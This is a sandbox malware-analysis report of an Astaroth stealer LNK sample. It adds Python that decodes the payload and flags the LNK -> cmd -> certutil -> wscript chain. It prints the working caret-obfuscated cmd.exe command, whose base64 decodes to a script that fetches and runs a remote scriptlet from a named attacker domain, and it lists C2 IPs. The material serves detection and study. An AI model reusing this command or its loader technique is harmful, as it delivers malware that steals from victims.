Source: unknown | HTTPS traffic detected: 104.16.123.96:443 -> 192.168.2.6:49712 version: TLS 1.2 |
Source: C:\Windows\System32\wscript.exe | Network Connect: 104.21.40.83 80 |
Source: C:\Windows\System32\wscript.exe | Domain query: www.cloudflare.com |
Source: C:\Windows\System32\wscript.exe | Domain query: niua9f.tabcoperoo.sbs |
Source: C:\Windows\System32\wscript.exe | Network Connect: 104.16.123.96 443 |
Source: Traffic | Snort IDS: 2851288 ETPRO TROJAN Astaroth Stealer Activity (GET) 192.168.2.6:49711 -> 104.21.40.83:80 |
Source: global traffic | HTTP traffic detected:
    GET /cdn-cgi/error HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Connection: Keep-Alive
    Host: www.cloudflare.com
Source: global traffic | HTTP traffic detected:
    GET /?1/ HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: niua9f.tabcoperoo.sbs
    Connection: Keep-Alive
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS |
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19 |
Source: Joe Sandbox View | IP Address: 104.16.123.96 |
Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712 |
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Tue, 31 Jan 2023 11:59:15 GMT
    Transfer-Encoding: chunked
    Connection: close
    CF-Cache-Status: MISS
    Set-Cookie: __cf_bm=BIs2LD8_lhYDyYXTr0ymbzT_KjzhpIsN6DuljoTCxPg-1675166355-0-AV0FRZbQ/YWpHBGdw9CVjNw7G3I271nQZwq5VNc0+DtOmaDFBWm4yRe3SpBDVzanTI+rvMZJJ+XxqLF7XCOqemeSvMWAAipIG/oYn2fhIk83; path=/; expires=Tue, 31-Jan-23 12:29:15 GMT; domain=.www.cloudflare.com; HttpOnly; Secure; SameSite=None
    Server-Timing: cf-q-config;dur=8.000002708286e-06
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hNqoFO77GrxC4JG2BDzytZSNLUsdJe6l4oWIHVR1%2FQiLT3nU62Aje%2BDZd%2FXg0%2BSlGBRK9IsQhcIJX3XRAcR%2F08liOBCIEl%2ByvnWfusySEzWgAXvDKFweB1o508oh0bj7gDofBA%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Set-Cookie: __cflb=02DiuJFZNR1vT983reJ7ooDAdV9yu7NGmzFHzmddKWhKi; SameSite=None; Secure; path=/; expires=Wed, 01-Feb-23 10:59:15 GMT; HttpOnly
    Server: cloudflare
    CF-RAY: 792247b819f291f3-FRA
    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
Source: wscript.exe, 00000003.00000003.253451427.0000021060705000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: hTtP://niua9f.tabcoperoo.sbs/?1/ |
Source: wscript.exe, 00000003.00000003.253408697.00000210607A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.248160964.00000210607A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.254191636.00000210607A1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: wscript.exe, 00000003.00000002.254076024.0000021060745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.253451427.0000021060745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.248214429.0000021060761000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://niua9f.tabcoperoo.sbs/ |
Source: wscript.exe, 00000003.00000003.248214429.0000021060761000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.253451427.0000021060705000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://niua9f.tabcoperoo.sbs/?1/ |
Source: wscript.exe, 00000003.00000002.254076024.0000021060728000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.253581606.0000021060728000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.comp |
Source: wscript.exe, 00000003.00000002.254076024.0000021060745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.253451427.0000021060745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.248214429.0000021060761000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/ |
Source: wscript.exe, 00000003.00000002.254076024.0000021060745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.253451427.0000021060745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.248214429.0000021060761000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/M |
Source: wscript.exe, 00000003.00000003.253581606.0000021060783000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.248214429.0000021060783000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.248214429.0000021060761000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/cdn-cgi/error |
Source: wscript.exe, 00000003.00000003.248214429.0000021060783000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/cdn-cgi/errorP% |
Source: wscript.exe, 00000003.00000003.248214429.0000021060761000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/cdn-cgi/errore.com/U |
Source: unknown | DNS traffic detected: queries for: niua9f.tabcoperoo.sbs |
Source: C:\Windows\System32\certutil.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /V/D/c md C:\9cEA9JA\>nul 2>&1 &&s^eT SEEH=C:\9cEA9JA\^9cEA9JA.^jS&&echo dmFyIENmS3I9InNjIisiciI7RGZLcj0iaXAiKyJ0OmgiO0VmS3I9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDZktyK0RmS3IrRWZLcisiLy9uaXVhOWYudGFiY29wZXJvby5zYnMvPzEvIik7>!SEEH!&&cErtUtil -f -dEco^de !SEEH! !SEEH!&&ca^ll !SEEH! |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\certutil.exe cErtUtil -f -dEcode C:\9cEA9JA\9cEA9JA.jS C:\9cEA9JA\9cEA9JA.jS |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\9cEA9JA\9cEA9JA.jS" |
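The cmd.exe command line above is the whole first stage: carets (`^`) break up `set`, `decode` and `call` to defeat naive string matching, `echo` writes a base64 blob into a freshly created directory, `certutil -f -decode` turns it back into a .jS script in place (same input and output path), and `call` hands it to WScript. The following Python is a worked example added here, not part of the Joe Sandbox report: it reproduces offline what certutil and the script do, stripping the carets, pulling the base64 out of the `echo`, decoding it, and resolving the string-concatenation obfuscation in the resulting JScript to recover the `GetObject("script:...")` moniker, which is the next-stage URL that also shows up in the wscript.exe memory strings above. The command line is copied from the report; the resolver only understands the literal-concatenation idiom this sample uses, not general JavaScript.

```python
import base64
import re

# Command line of the cmd.exe the LNK spawns, copied from the sandbox report row above.
LNK_CMDLINE = (
    r"C:\Windows\system32\cmd.exe /V/D/c md C:\9cEA9JA\>nul 2>&1 "
    r"&&s^eT SEEH=C:\9cEA9JA\^9cEA9JA.^jS&&echo "
    "dmFyIENmS3I9InNjIisiciI7RGZLcj0iaXAiKyJ0OmgiO0VmS3I9IlQiKyJ0UCIrIjoiO0dldE9i"
    "amVjdChDZktyK0RmS3IrRWZLcisiLy9uaXVhOWYudGFiY29wZXJvby5zYnMvPzEvIik7"
    r">!SEEH!&&cErtUtil -f -dEco^de !SEEH! !SEEH!&&ca^ll !SEEH!"
)


def strip_carets(cmdline: str) -> str:
    """cmd.exe consumes '^' as an escape character, so the tokens it really
    executes are the command line with every caret removed."""
    return cmdline.replace("^", "")


def extract_echo_payload(cmdline: str) -> str:
    """Return what `echo ...>file` writes to disk, i.e. certutil's input."""
    match = re.search(r"echo\s+(\S+?)>", strip_carets(cmdline))
    if match is None:
        raise ValueError("no echo redirection in command line")
    return match.group(1)


def decode_like_certutil(payload: str) -> str:
    """`certutil -f -decode in out` is plain base64 decoding; -f only permits
    overwriting the output, which here is the input file itself."""
    return base64.b64decode(payload).decode("ascii")


def _concat_value(expr: str, env: dict) -> str:
    """Evaluate a JScript expression made only of "literal" + name + "literal"."""
    parts = []
    for literal, name in re.findall(r'"([^"]*)"|(\w+)', expr):
        parts.append(env[name] if name else literal)
    return "".join(parts)


def resolve_getobject_target(js: str) -> str:
    """Follow the var="a"+"b" assignments in order and rebuild the argument
    of GetObject(). Handles the literal-concatenation idiom of this sample
    only; it is not a JavaScript interpreter."""
    env = {}
    assignment = r'(?:var\s+)?(\w+)\s*=\s*((?:"[^"]*"\s*\+\s*)*"[^"]*")\s*;'
    for name, expr in re.findall(assignment, js):
        env[name] = _concat_value(expr, env)
    call = re.search(r"GetObject\(([^)]*)\)", js)
    if call is None:
        raise ValueError("no GetObject() call in script")
    return _concat_value(call.group(1), env)


def next_stage_moniker(cmdline: str = LNK_CMDLINE) -> str:
    """Full pipeline: cmd line -> base64 -> JScript -> 'script:' moniker URL."""
    return resolve_getobject_target(decode_like_certutil(extract_echo_payload(cmdline)))


if __name__ == "__main__":
    js = decode_like_certutil(extract_echo_payload(LNK_CMDLINE))
    print("decoded 9cEA9JA.jS:", js)
    print("GetObject target :", next_stage_moniker())
```

The recovered argument starts with `script:`, the scriptlet moniker: `GetObject("script:http://...")` makes scrobj.dll fetch and execute a remote scriptlet, so the URL it yields is the IOC to block and hunt for, and the `hTtP` casing is the same string the sandbox later found in wscript.exe memory.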
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32 |
Source: classification engine | Classification label: mal68.evad.winLNK@6/1@2/2 |
Source: C:\Windows\System32\cmd.exe | File read: C:\Users\user\Desktop\desktop.ini |
Source: C:\Windows\System32\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts (3 reads logged) |
Source: LNK file | Process created: C:\Windows\System32\cmd.exe |
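On the process-creation side, the chain LNK -> cmd.exe -> certutil.exe -> wscript.exe carries three signals that are cheap to check in endpoint telemetry: caret-obfuscated cmd tokens, certutil decoding a file onto itself, and a script host launched on a file in a directory the same cmd.exe just created with `md`. The Python below is an added example (not part of the report or of Joe Sandbox) that encodes those checks and runs them over a constructed list of process events modelled on the rows above, plus one benign certutil control; the event schema (pid, ppid, image, cmdline), the pid values and the rule names are assumptions.

```python
import re

# Constructed process-creation events modelled on the report rows (pid/ppid values are
# made up; images and command lines are those in the report). The last event is a
# benign control: certutil decoding a certificate into a different file.
EVENTS = [
    {"pid": 2, "ppid": 1, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"C:\Windows\system32\cmd.exe /V/D/c md C:\9cEA9JA\>nul 2>&1 "
                r"&&s^eT SEEH=C:\9cEA9JA\^9cEA9JA.^jS&&echo "
                "dmFyIENmS3I9InNjIisiciI7RGZLcj0iaXAiKyJ0OmgiO0VmS3I9IlQiKyJ0UCIrIjoiO0dldE9i"
                "amVjdChDZktyK0RmS3IrRWZLcisiLy9uaXVhOWYudGFiY29wZXJvby5zYnMvPzEvIik7"
                r">!SEEH!&&cErtUtil -f -dEco^de !SEEH! !SEEH!&&ca^ll !SEEH!"},
    {"pid": 3, "ppid": 2, "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"cErtUtil -f -dEcode C:\9cEA9JA\9cEA9JA.jS C:\9cEA9JA\9cEA9JA.jS"},
    {"pid": 4, "ppid": 2, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'"C:\Windows\System32\WScript.exe" "C:\9cEA9JA\9cEA9JA.jS"'},
    {"pid": 5, "ppid": 1, "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil -decode C:\Temp\cert.b64 C:\Temp\cert.cer"},
]


def win_split(cmdline: str) -> list:
    """Minimal Windows argument splitter: honours double quotes and drops the
    carets cmd.exe would already have consumed as escapes."""
    return [q or u for q, u in re.findall(r'"([^"]*)"|(\S+)', cmdline.replace("^", ""))]


def caret_obfuscation_score(cmdline: str) -> int:
    """Carets inserted inside a plain word (s^eT, dEco^de, ca^ll). A legitimate
    escape precedes a metacharacter, not a letter."""
    return len(re.findall(r"[A-Za-z]\^[A-Za-z]", cmdline))


def is_inplace_certutil_decode(cmdline: str) -> bool:
    """certutil -decode/-decodehex whose output path equals its input path:
    the staged base64 is overwritten by the payload, leaving no second file."""
    toks = [t.lower() for t in win_split(cmdline)]
    if len(toks) < 3 or "certutil" not in toks[0]:
        return False
    return any(t in ("-decode", "-decodehex") for t in toks) and toks[-1] == toks[-2]


def script_host_from_cmd_created_dir(child: dict, parent: dict) -> bool:
    """wscript/cscript running a file out of a directory that the parent cmd.exe
    created with md/mkdir in its own command line."""
    toks = win_split(child["cmdline"])
    if not toks or not re.search(r"[wc]script(\.exe)?$", toks[0].lower()):
        return False
    scripts = [t for t in toks[1:] if not t.startswith("/")]   # skip //nologo-style switches
    if not scripts:
        return False
    script_dir = scripts[0].rsplit("\\", 1)[0].lower()
    ptoks = [t.lower() for t in win_split(parent["cmdline"])]
    for i, t in enumerate(ptoks[:-1]):
        if t in ("md", "mkdir"):
            made = ptoks[i + 1].split(">")[0].rstrip("\\")   # drop '>nul' and trailing '\'
            if made == script_dir:
                return True
    return False


def triage(events: list) -> list:
    """Return (pid, rule) hits for a list of process-creation events."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        image = e["image"].lower()
        parent = by_pid.get(e["ppid"])
        if image.endswith("cmd.exe") and caret_obfuscation_score(e["cmdline"]) >= 2:
            hits.append((e["pid"], "cmd_caret_obfuscation"))
        if image.endswith("certutil.exe") and is_inplace_certutil_decode(e["cmdline"]):
            hits.append((e["pid"], "certutil_inplace_decode"))
        if (parent and parent["image"].lower().endswith("cmd.exe")
                and script_host_from_cmd_created_dir(e, parent)):
            hits.append((e["pid"], "wsh_script_from_cmd_created_dir"))
    return hits


if __name__ == "__main__":
    for pid, rule in triage(EVENTS):
        print(f"pid {pid}: {rule}")
```

Each rule on its own is noisy (admins do run certutil -decode, and carets appear in honest batch files); the value is in the three firing on one parent/child chain, which is why `triage` keys on the ppid link rather than scoring processes in isolation.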
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX (2 entries) |
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer |
Source: wscript.exe, 00000003.00000002.254076024.0000021060728000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.253581606.0000021060728000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW/ |
Source: wscript.exe, 00000003.00000003.253581606.000002106078D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.254076024.0000021060745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.253451427.0000021060745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.254076024.000002106078D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.248214429.000002106078D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW |
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation |
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid |